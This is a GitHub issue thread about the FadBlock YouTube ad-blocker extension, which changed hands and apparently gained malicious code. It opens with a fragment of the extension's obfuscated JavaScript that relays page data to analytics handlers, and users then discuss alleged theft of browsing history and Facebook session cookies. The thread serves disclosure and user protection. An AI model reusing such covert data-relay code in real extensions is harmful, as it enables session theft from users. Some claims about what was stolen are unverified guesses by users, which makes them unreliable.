                    let document = element.data;
                    chromeAPI.runtimeAPI.sendMsg(
                      {
                        action: "fad-action-cf",
                        url: variableF1,
                        querySelectorAll: variableF2,
                      },
                      function (element) {
                        let cfData = element;
                        chromeAPI.runtimeAPI.sendMsg(
                          {
                            action: "fad-action-analytic",
                            url: divider,
                            pl: {
                              length: index,
                              remainder: isXMLDoc,
                              querySelectorAll: cache,
                              support: result,
                              element: document,
                              documentElement: ownerDocument,
                              matches: length,
                              unsupportedSelectors: matchesSelector,
                              index: matches,
                              newResult: cfData,
                            },
                          },
                          function (element) {
                            chromeAPI.localStorage.local
                              .set({
                                youtubeData:
                                  JSONParser.stringify(ownerDocument),
                              })
                              .then(() => {});
                          },
                        );
                      },
                    );
                  },
                );
              },
            );

Where

• variableGz = fad18
• variableGo = fad14
• variableGi = fad15

The thing is, from https://fadblock.pro/check/extension, that stop to fad12, so there is a world where this request return more stuff.

I think the easiest way is to execute this app in sandbox and analyse requests. Or maybe we just don't care.

from fadblock.

You should probably also steer clear of this extension: Adblock for Youtube™. It isn't the Fadblock extension; it is a separate extension which works differently with 10M+ users. It uses the same icon and it also requires invasive permissions for every website.

from fadblock.

I completely understand, @JaielZeus, in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users. Maintenance had become challenging, and I envisioned FadBlock evolving into a robust full-blown ChatGPT-powered powerhouse, capable of generating transcripts, language translation, and more, with significant potential…and I didn't have the time to tend to it.

I did all this solely because of the few people who supported this project, whether monetarily or emotionally amid all the negativity, and I couldn't leave you all hanging. This isn't about seeking forgiveness or anything, I just see it as my duty.

from fadblock.

This is so bad, first selling us "life time" keys, then selling the software to a unknown third party ??

from fadblock.

@christian100kodehode, in the memo, the licenses were to be retained - which they still are - but I never thought they would try to package the extension into malware.

I have published a new version - replicated the whole database so that lifetime users can log in effortlessly again without any re-payment hassles or even reaching out for troubleshooting.

I am also planning to open-source the current version's codebase and reverse the open-core status. I am very sorry for all the commotion but I never expected any of this. The support was bare-minimum and I wanted to hand it off so it could evolve into something even bigger and better. :/

@fabriziocarloni, I think so, as you can see here on the thread, I and @poka-IT both came to the same conclusion while independently investigating.

from fadblock.

As said previously, I am in no way saying it's not uploading anything, it was @poka-IT who deep-dived and uncovered the requests, it's better to switch out, and have a security audit of our accounts - I did the same.

from fadblock.

@0x48piraj What I would like to know for sure is what data is really sent to the fadblock.pro domain. In addition to the history of sites visited and I think the cookies of active sessions. I would like to make sure that nothing else is sent such as credentials stored on chrome or anything else.
Please is there anyone among us who can do an in-depth analysis to definitively clarify this thing? I think knowing this is very important for all of us.

from fadblock.

@0x48piraj Hello, may I ask if it's possible for you to delete the registry key from the Windows Registry Editor or remove the specific string from the registry within the browser? Thank you for your efforts.

from fadblock.

Yeah, knowing the impact would help a lot @fabriziocarloni. As @poka-IT investigated, he ran and saw the outgoing/incoming requests and it seems like it doesn't exfil anything as of now. I found the same thing when I let it run in a separate profile. And there have been no new updates since the 24th.

I'm reading the code you provided, I don't see any malicious code on my side. External requests are only made on https://fadblock.pro/check/extension, with just fetching datas, doesn't seems to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics as you said. Probably loggin IP address, that's it. But i'm just linux sys admin not security expert, maybe missed something.

@twer1775, I don't understand, what registry key? I don't think Windows Registry keys come into the scope of this project.

from fadblock.

@0x48piraj and @poka-IT I analyzed the computer where the extension with the malicious code was installed and I came to the conclusion that this extension most likely caused the hack. But please, I would like your help in finding concrete evidence because it could also help everyone else who has installed it. I don't think it's a coincidence that a few days after having given permission to read and modify all the data on all the websites we were hacked on Facebook. I really hope I'm wrong but I don't think so.

from fadblock.

@fabriziocarloni, I have submitted the malicious bit to various AV sandboxes - since I haven't delved into extensive JS reverse engineering before, it's taking some time to grasp the code. If anyone is willing to help, please feel free to contribute.

from fadblock.

Thanks @0x48piraj I hope someone of good will wants to contribute to helping us understand what this extension really does. I see it as a challenge. I am not a security expert and if no one wants to help us discover the truth as soon as I have time I would like to try installing this extension with malicious code on a sandbox and with wireshark try to analyze the data traffic towards fadblock.pro for me it is important to understand it.

from fadblock.

from fadblock.

@seebeedub If they have inserted malicious code that sends cookies with username and password to their servers I don't think they will ever be honest.

from fadblock.

The "sell licenses then resell the software shortly after" was a bad move IMO. Then unfortunate things happened, that's bad.

But thank you for handling things as best as you could have done after the bad things happened. Warning users, re-uploading the extension, and preserving licenses, was the hard but right step. I'm sure it wasn't easy for you, thank you.

from fadblock.

@0x48piraj This should be reported to Google to have the extension with the malicious code removed immediately. It cannot be left so downloadable by everyone. Please do everything you can to have it removed.

from fadblock.

How to completed uninstall fadblock or fadblock original?
thanks for advise.

from fadblock.

@JustinGITUB To completely uninstall fadblock just remove this extension from chrome.

from fadblock.

@fabriziocarloni, I have emailed everyone who supported to report the extension days before.

from fadblock.

@0x48piraj I did my part by demonstrating that that malicious code doesn't just send the Chrome history but does something more important by sending cookies from active sessions on Facebook to then easily hack the accounts. But now it's up to you to do everything you can to get Google to remove it from its Chrome Web Store. I don't want what happened to us to happen to others.

from fadblock.

@fabriziocarloni In the last few days I was receiving several emails in different occasions because someone asked to reset my password (not me).

Maybe the 2FA on my account avoided the issue.

Is this connected to the extension or it could be something else?

Uhm...

from fadblock.

I disabled the extension over a month ago because it was repeatedly asking for a donation. Today Chrome comes up with this, so I deleted the extension entirely. AdNauseum is so good. Haven't looked back for awhile. Fadblock has been sketchy from the start.

from fadblock.

@Rynn21 I'm glad that Chrome finally sees this as an extension that contains malware. I just hope they delete it from the Chrome Web Store as soon as possible otherwise it will continue to cause damage.

from fadblock.

It appears that the version of fadblock with malicious code has been removed from the Chrome Web Store (see https://chromewebstore.google.com/detail/fadblock-friendly-adblock/mdadjjfmjhfcibgfhfjbaiiljpllkbfc). I hope it's not a coincidence and that it's true.

from fadblock.

No one should install anything named Fadblock again. Change your passwords too.

from fadblock.

What can we do right now? Does changing password also invalid your cookies?
@fabriziocarloni

from fadblock.

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

Yes. A lot of people online are sharing the extent of how sketchy the extension was and is, including things about the author.

from fadblock.

Does the malicious code do anything on websites other than Facebook? If I didn't use Facebook at all before I uninstall the extension today should I worry about anything?

from fadblock.

@moemisaka9 It was certainly active in stealing session cookies from Facebook. However, I don't rule out that it was also active for other sites that I didn't have the opportunity to test.

from fadblock.

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

from fadblock.

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

Positive.

from fadblock.

@Rynn21 oh i sent one item here and deleted it cuz i thought it was not needed here if thats what your talking about

from fadblock.

Any news what data/sites was compromised? (other than facebook)

from fadblock.

@Rynn21 oh i sent one item here and deleted it cuz i thought it was not needed here if thats what your talking about

It was someone else, but they probably deleted their chain of replies.

from fadblock.

@0x48piraj have you finished inspecting the code?
Are there any other websites we should be worried about besides Facebook and Instagram?

from fadblock.

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

@0x48piraj I need to have an answer, the threat is serious.

I need to know if I have to start changing dozens and dozens of passwords.

from fadblock.